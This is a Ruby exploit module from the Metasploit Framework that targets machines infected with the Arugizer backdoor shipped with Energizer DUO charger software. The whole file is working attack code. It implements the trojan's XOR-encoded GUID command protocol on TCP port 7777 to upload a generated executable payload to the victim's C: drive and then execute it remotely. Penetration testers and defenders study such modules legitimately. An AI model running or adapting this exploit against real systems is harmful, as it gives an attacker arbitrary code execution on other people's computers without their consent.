##
# $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Energizer DUO Trojan Code Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload against any system
				infected with the Arugizer trojan horse. This backdoor was shipped with
				the software package accompanying the Energizer Duo USB battery charger.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10389 $',
			'References'     =>
				[
					['CVE', '2010-0103'],
					['OSVDB', '62782'],
					['US-CERT-VU', '154421']
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 05 2010'
			))

		# The backdoor listens on TCP/7777 by default.
		register_options(
			[
				Opt::RPORT(7777),
			], self.class)
	end

	# Every byte on the wire is XORed with the single constant 0xE5, so this
	# routine both encodes outgoing data and decodes the server's replies.
	def trojan_encode(str)
		str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
	end

	# Commands are identified by GUID strings sent as a length-prefixed,
	# NUL-terminated field (u32 little-endian length, NUL included in the count).
	def trojan_command(cmd)
		cid = ""
		case cmd
		when :exec
			cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
		when :dir
			cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
		when :write
			cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
		when :read
			cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
		when :nop
			cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
		when :find
			cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
		when :yes
			cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
		when :runonce
			cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
		when :delete
			cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
		end
		trojan_encode( [cid.length + 1].pack("V") + cid + "\x00" )
	end

	def exploit
		# File name and payload are NUL-terminated; the terminator is counted
		# in the length prefix sent ahead of each field.
		nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
		exe = generate_payload_exe + "\x00"

		print_status("Trying to upload #{nam}...")

		connect

		# Write file request
		sock.put(trojan_command(:write))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))
		sock.put(trojan_encode([exe.length].pack("V")))
		sock.put(trojan_encode(exe))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect

		#
		# Execute the payload
		#
		print_status("Trying to execute #{nam}...")

		connect

		# Execute file request
		sock.put(trojan_command(:exec))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect
	end

end